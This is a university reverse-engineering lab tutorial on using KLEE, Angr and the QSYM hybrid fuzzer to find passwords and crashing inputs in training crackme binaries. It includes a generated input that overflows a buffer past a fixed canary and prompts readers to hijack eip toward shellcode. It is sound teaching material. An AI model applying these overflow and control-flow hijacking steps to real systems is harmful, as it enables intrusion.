IOLI Crackme Level 0x00 Password: Invalid Password! Invalid Password! Invalid Password! Invalid Password! Invalid Password! Invalid Password! Invalid Password! Password OK :) KLEE: done: total instructions = 12938 KLEE: done: completed paths = 8 KLEE: done: generated tests = 8
Let's check and replay the last (8th) test case to see if it really is the input that we are looking for:
$ ktest-tool klee-last/test000008.ktest object 0: name: 'buf' object 0: text: 250381.222222222 $ gcc -I ./include crackme0x01.c -lkleeRuntest -o crackme0x01 $ KTEST_FILE=klee-last/test000008.ktest ./crackme0x01 IOLI Crackme Level 0x01 Password: Password OK :)
Yes, KLEE is capable of handling symbolic variable that goes through a call to strcpy();, and find corresponding path. Take a look at test cases one to seven, and you would be able to imagine the steps KLEE took to find paths and corresponding test cases in this example.
Now, we have crackme0x02 and crackme0x03 left. crackme0x02 has a if statement, which checks if the input * 345 equals to 1190940. Would KLEE work in this case? crackme0x03 has a weird-looking shifting mechanism, but it will print "Password OK :)" if a certain condition is met. Your task is to further explore KLEE to find the inputs for those two binaries that makes them print "Password OK :)".
crackme0x02
crackme0x03
Our next target is bof.c. It has a classic buffer overflow bug, by which the buf variable in vuln() function can be overflown by an input string provided by a user.
bof.c
vuln()
Your task is to run KLEE on this target to find the buggy test case. These are the required steps (same as above): (1) Mark input as symbolic. (2) Remove the code that reads user input, because KLEE will auto-generate symbolic values for input. (3) Compile bof.c to LLVM bitcode, namely, bof.bc (refer to Exercise 1). (4) Run klee, and investigate the results. (5) Replay the buggy test case to confirm the bug.
input
bof.bc
Have you found the test case to trigger the bug? We have examined simple cases, but imagine you have many larger, complicated programs to analyze with limited amount of time. You could be assisted by this automated technique!
For further technical details, check the official paper published in OSDI'08.
One caveat lying here is that KLEE requires a source code along with an LLVM compiler toolchain to conduct symbolic execution. Then, what if we only have a binary, but still want to do symbolic execution? Angr comes into play in this case.
Angr is a user-friendly binary analysis framework. With its Python API, you can symbolically execute a program and do various analysis, without the existence of a source code.
In this tutorial, we will learn how to find a desired execution path and corresponding input through Angr framework.
Now, you only have a binary that asks you to input a password. Instead of brute-forcing, we can take advantage of Angr's symbolic execution that runs directly on binaries to find the desired input. Let's open crackme0x00.py, and follow its procedure.
crackme0x00.py
cd /tut/tut10-02-symexec/tut2-angr vim crackme0x00.py
Angr's analysis always begins with loading a binary into a Project object. If you want to analyze crackme0x00 binary, do:
import angr proj = angr.Project("crackme0x00")
With Angr, we can specify the target address in the binary that we want to reach, (preferrably a buggy basic block), and have the constraint solver find the corresponding test case by solving the collected path constraints. Let's run gdb and analyze the binary to find the target address:
$ gdb-pwndbg ./crackme0x00 pwndbg> disass main ... 0x08049328 <+112>: push 0x804a095 0x0804932d <+117>: call 0x80491f6 <print_key>
The main function is calling print_key function, and it seems that if we somehow reach there, it would print the flag for us.
print_key
Back to crackme0x00.py. Angr provides a loader, which helps you find symbols from the binary (like what pwntools does):
addr_main = proj.loader.find_symbol("main").rebased_addr addr_target = addr_main + 112 # push 0x804a095
Now that we have the address of main, where we want to start analysis, we can define an initial state as follows:
state = proj.factory.entry_state(addr=addr_main)
Simulation manager is a control interface for Angr's symbolic execution. With the defined state, we can initiate this module:
sm = proj.factory.simulation_manager(state)
explore method of the simulation manager lets us symbolically execute the binary until it finds the state satisfyig the find parameter. In this case, addr_target will be given as a parameter. And until the simulation manager finds the path to the addr_target, we can keep stepping through the instructions:
explore
find
addr_target
sm.explore(find=addr_target) while len(sm.found) == 0: sm.step()
If a path is found, it will dump the input and verify the test case:
if (len(sm.found) > 0): print("found!") found_input = sm.found[0].posix.dumps(0) # this is the stdin print(found_input) with open("input-crackme0x00", "wb") as fp: fp.write(found_input)
Now, let's run the script and check if Angr really finds the desired path.
$ ./crackme0x00.py Finding input ... found! b'250381\x00\xd9\xd9..'
Starting from function main @0x080492b8, Angr symbolically executed the crackme0x00 binary to find the state that can reach the basic block at 0x08049328. It successfully found the block, and by solving the path constraints, emitted the test case as "250381\x00..."
main @0x080492b8
0x08049328
Verifying this is straightforward, as we can now concretely execute the binary with the found test case:
$ ./crackme0x00 < input-crackme0x00 IOLI Crackme Level 0x00 Password: Password OK :) FLAG
As expected, the test case printed the flag!
Another interesting example is when the binary has canary implemented. Launch crackme0x00-canary and feed it with different inputs:
crackme0x00-canary
$ ./crackme0x00-canary IOLI Crackme Level 0x00 Password:aaaabbbb Invalid Password! $ ./crackme0x00-canary IOLI Crackme Level 0x00 Password:aaaabbbbccccddddeeee Invalid Password! crackme0x00-canary: *** stack smashing detected ***
In case we provided 20-byte input, the stack smashing seems to be detected through a canary, and because of that, we cannot not control the eip of this binary. In such case, could Angr help us find an input that can even bypass the canary check? (heads up: this binary implements a custom, weak canary, where the value is fixed.)
eip
Let's take a look at crackme0x00-canary.py. The flow of symbolic execution is similar to that of the previous exercise, but note that we have to take advantage of an "unconstrained state" to solve this challenge.
crackme0x00-canary.py
Typically, when the size of a symbolic variable is known, a symbolic executor only considers values within the size. For example, if our character buffer of 16 bytes is marked symbolic, all the symbolic paths are reachable with an input that is shorter than 16 bytes, because the variable is constrained by its size. However, we know that the size of input to be stored in the buffer could be larger than the size, causing some troubles. To test such situation, unconstrained is used:
unconstrained
sm = proj.factory.simulation_manager(save_unconstrained=True) while len(sm.unconstrained) == 0: sm.step()
This lets the simulation manager symbolically execute the target program until an effective unconstrained input (i.e., triggering buffer overflow in this case) is found. We can dump the stdin of this case, and see what happened:
unconstrained_state = sm.unconstrained[0] crashing_input = unconstrained_state.posix.dumps(0) print("found!") print(repr(crashing_input)) with open("input-crackme0x00-canary", "wb") as fp: fp.write(crashing_input)
$ ./crackme0x00-canary.py finding buffer overflow & bypassing static canary ... found! b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x81\x14\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01'
Do you see that the input is long enough to overflow the buffer, overwrite the canary, and even the return address? Also, bytes 17-21 of the input are 0xdeadbeef. Guess what the static canary is?
We can verify this result by running the binary with the dumped input:
$ ./crackme0x00-canary < input-crackme0x00-canary IOLI Crackme Level 0x00 Password:Invalid Password! [1] 13740 segmentation fault (core dumped) ./crackme0x00-canary < input-crackme0x00-canary
It indeed triggered a buffer overflow, and a segmentation fault, which means that Angr also found the canary!
Now you can start examining the core dump, and learn which part of the input should be changed to hijack the control flow:
$ gdb-pwndbg ./crackme0x00-canary core pwndbg> info registers eip eip 0x2148100 0x2148100 pwndbg> quit $ xxd input-crackeme0x00-canary 00000000: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000010: efbe adde 0000 0000 0000 0000 0000 0000 ................ 00000020: 0081 1402 0000 0000 0000 0000 0000 0000 ................ 00000030: 0000 0000 0000 0000 0000 0101 ............
Now you know where to modify from the input to make the program jump to any place you want. Try making it jump to your shellcode, and print the flag!
Practice writing scripts for symbolic execution using Angr framework against the rest of the crackme binaries. Your task is to find the input that makes each binary print out "Password OK :)".
Let's take a look at another example, pwd.
pwd
$ ./pwd Enter the password: 12345678 Access denied. $ ./pwd ./pwd Enter the password: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Access denied. *** stack smashing detected ***: <unknown> terminated [1] 18317 abort (core dumped) ./pwd
This binary appears to be a password authenticator, and we want to crack it by finding the password string using Angr. Take a look at the given template, pwd_template.py, and fill in the required parts by analyzing the pwd binary.
pwd_template.py
Ultimately, we are looking for the input (i.e., valid password), which will make pwd binary print "Access granted!". FYI, once the path is found, you can print the stdin through:
print("input: {0}".format(sm.active[0].posix.dumps(sys.stdin.fileno())))
[TASK] Analyze the binary, complete and execute the Angr script to find the password, and verify it against the pwd binary.
In this tutorial, we will learn about hybrid fuzzing, which combines fuzzing and symbolic execution to overcome their limitations. Moreover, we will have an exercise of using QSYM, a state-of-the-art hybrid fuzzer.
To understand the limitations of fuzzing and symbolic execution, let's take a look at an example: (https://github.com/sslab-gatech/qsym/blob/master/vagrant/example.c)
int main(int argc, char** argv) { if (argc < 2) { printf("Usage: %s [input]\n", argv[0]); exit(-1); } FILE* fp = fopen(argv[1], "rb"); if (fp == NULL) { printf("[-] Failed to open\n"); exit(-1); } int x, y; char buf[32]; ck_fread(&x, sizeof(x), 1, fp); ck_fread(buf, 1, sizeof(buf), fp); ck_fread(&y, sizeof(y), 1, fp);
First of all, the program opens a file whose name is given by the first argument of this program. Then, it fills three variables, x, buf, and y with the contents of the file.
// Challenge for fuzzing if (x == 0xdeadbeef) { printf("Step 1 passed\n");
Then, it checks if x is equivalent to a magic number 0xdeadbeef. As we have seen before in the symbolic execution tutorial, such a check is troublesome for fuzzing, because the constraint is not likely to be met through a randomly-generated input (the chance is 1 our of 2^32, which is extremely low). However, through a symbolic execution, we can easily find the input that satisfies this condition, beause it is fairly simple to solve such a simple path constraint, i.e., x == 0xdeadbeef.
x == 0xdeadbeef
// Challenge for symbolic execution int count = 0; for (int i = 0; i < 32; i++) { if (buf[i] >= 'a') count++; } if (count >= 8) { printf("Step 2 passed\n");
Unfortunately, symbolic execution is not a panacea. The example program also contains a simple, yet challenging routine for symbolic execution as shown in the above code. This introduces the most famous and notorious limitation of symbolic execution, known as path explosion. Path explosion refers to a situation where the number of paths exponentially grow during symbolic execution, making it difficult for symbolic execution to scale.
For example, in the example above, the number of feasible paths at the last if-statement is 2^32, which is extremely large to be handled through symbolic execution, because each element (total 32) of the buf array would diverge a current execution.
// Challenge for fuzzing, again if ((x ^ y) == 0xbadf00d) { printf("Step 3 passed\n"); ((void(*)())0)(); }
Finally, the program has the third branch that is challenging for fuzzing to solve, followed by a buggy statement, i.e., ((void(*)())0)();. In order to reach the bug, we need to handle challenges for both symbolic execution and fuzzing, simultaneously. For exmaple, we won't find a bug if we only run symbolic execution because of the second challenge. If we only run fuzzing, it won't even pass the first challenge.
((void(*)())0)();
To resolve these issues, researchers have proposed hybrid fuzzing, which combines symbolic execution and fuzzing to complement their drawbacks. The idea is simple, yet effective; hybrid fuzzing selectively utilizes symbolic execution to when it faces branches that are challenging to get through with fuzzing (e.g., the first challenge above). One of the recent work in hybrid fuzzing is QSYM. In the remaining part of this tutorial, we will learn how to use QSYM for finding previously mentioned bugs, buried deep in programs.
For easier installation, QSYM provides a pre-built VM image using vagrant. Installing QSYM through vagrant is fairly straightfoward.
$ vagrant init jakkdu/qsym $ vagrant up $ vagrant ssh
Then, you have a SSH session in the QSYM's VM image. Let's use QSYM to find a bug in the previous example.
Before running QSYM, we need to set up several environments. First, we need to load some kernel configurations that QSYM depends on using sysctl command.
sysctl
$ sudo sysctl --system
Then, we need to compile the example program into two versions; one for fuzzing and the other for concolic execution. We use a compiler from afl (afl-gcc) to instrument the binary for fuzzing, so that the code coverage could be collected while fuzzing. For compiling the binary for concolic execution, we use stock gcc.
# for fuzzing $ ./afl-2.52b/afl-gcc -o example-afl example.c # for concolic execution $ gcc -o example example.c
We also need to prepare initial seed to fuzz. In our experiment, we will use a dumb test case that contains many 'A's. As you can imagine, a program being executed with this seed file as an input will not print anything, because it won't be able to pass any of the three steps that we have discussed above.
# make a seed $ mkdir input $ python -c'print"A"*4096' > input/seed # nothing will print out $ ./example ./input/seed
As we discussed before, fuzzing cannot find this bug because of constraints that are hard to be met in a random manner. To verify this, let's run two AFL instances to find the bug. It is worth noting that AFL supports fuzzing with multiple instances to utilize multiple cores in a modern computer. To enable it, you can have one master and multiple slaves. In this example, we will use one master and one slave instance for AFL.
# terminal 1 (using vagrant ssh) $ ./afl-2.52b/afl-fuzz -M afl-master -i input -o output -- ./example-afl @@ # terminal 2 $ ./afl-2.52b/afl-fuzz -S afl-slave -i input -o output -- ./example-afl @@
Even after a few minutes (even hours), AFL will fail to find this bug. Let's add QSYM to overcome this issue.
# terminal 3 $ ./qsym/bin/run_qsym_afl.py -a afl-slave -o output -n qsym -- ./example @@
Then, after a few seconds, QSYM will find the bug magically. Let's understand how QSYM can find this bug. Note that the following file names and contents could be slightly different from yours because of randomness in fuzzing.
$ xxd output/qsym/queue/id\:000000\,src\:id\:000000 00000000: efbe adde 4141 4141 4141 4141 4141 4141 ....AAAAAAAAAAAA 00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000020: 4141 4141 4141 4141 AAAAAAAA $ ./example ./output/qsym/queue/id\:000000* Step 1 passed
If we see the first input generated by QSYM, we will see that QSYM's concolic execution sucessfully discovers an input that passes the first branch (i.e., the first four bytes are 0xdeadbeef). Unfortunately, this input only satisfies the first one, not others. After getting this input, AFL can pass the second branch using fuzzing. Let's take a look at the final input.
$ xxd output/afl-slave/crashes/id\:000000\,sig\:11\,sync\:qsym\,src\:000003 00000000: efbe adde 4141 4141 6161 6161 6161 6161 ....AAAAaaaaaaaa 00000010: 6161 6161 6161 6161 6161 6161 6161 4141 aaaaaaaaaaaaaaAA 00000020: 4141 4141 e24e 00d5 AAAA.N.. $ ls output/qsym/queue/id\:000003* output/qsym/queue/id:000003,src:id:000005 $ xxd output/afl-slave/queue/id\:000005\,src\:000004\,op\:havoc\,rep\:2\,+cov 00000000: efbe adde 4141 4141 6161 6161 6161 6161 ....AAAAaaaaaaaa 00000010: 6161 6161 6161 6161 6161 6161 6161 4141 aaaaaaaaaaaaaaAA 00000020: 4141 4141 4141 4141 AAAAAAAA
As we can see, the final output has several non-'A' characters to satisfy the second branch, which requires at least eight characters that are greater than 'a'. Where does it come from? To figure out this, let's look at its file name. sync:qsym in the name of crash file represents that it is generated by QSYM's concolic execution. Moreover, the last six digits (i.e., 000003) means its identifier for QSYM. Let's find the input in the QSYM's directory. The file from QSYM also has the six-digit id (i.e., 000005) at the last, which represents its source file. If we find the source file in the afl-slave's directory, we will see that this is generated by fuzzer; the file name does not contain sync:qsym but other strategy in AFL (i.e., havoc).
sync:qsym
afl-slave
havoc
[Task] Check LAVA/README.md and find at least ten bugs in base64 of LAVA-M dataset
This tutorial is designed to supplement CS6265: Information Security Lab: Reverse Engineering and Binary Exploitation, which has been offered at Georgia Tech by Taesoo Kim since 2016. Every year, this tutorial material have been updated based on the feedbacks from participating students. There are many TAs who have helped designing, developing and revising this tutorial: